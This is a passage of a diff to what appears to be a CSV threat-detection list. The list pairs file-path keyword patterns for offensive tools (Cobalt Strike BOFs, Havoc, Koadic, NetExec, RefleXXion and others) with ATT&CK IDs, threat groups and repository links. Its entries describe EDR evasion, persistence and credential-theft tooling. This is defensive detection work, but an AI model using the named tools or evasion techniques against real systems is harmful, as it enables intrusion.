T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/ReflectiveDLLInjection/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" @@ -4972,61 +5022,62 @@ "*/ReflectiveNtdll.git*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/RefleXXion.git*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*/reGeorg.git*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" -"*/RegistryPersistence.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/RegistryPersistence.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/Registry-Recon/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" -"*/regreeper.jpg*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*/Reg-Restore-Persistence-Mole*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/regreeper.jpg*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/Reg-Restore-Persistence-Mole*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*/regsvcs/meterpreter*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/regsvr.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/regsvr32/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/releases/download/*/abc.exe*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" -"*/releases/latest/download/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*/Remote/adcs_request/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/office_tokens/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/ProcessDestroy/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/ProcessListHandles/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/schtaskscreate/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/schtasksrun/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/setuserpass/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/unexpireuser/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/remote-method-guesser.git*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*/RemoteOps.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/releases/latest/download/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/Remote/adcs_request/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Remote/office_tokens/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 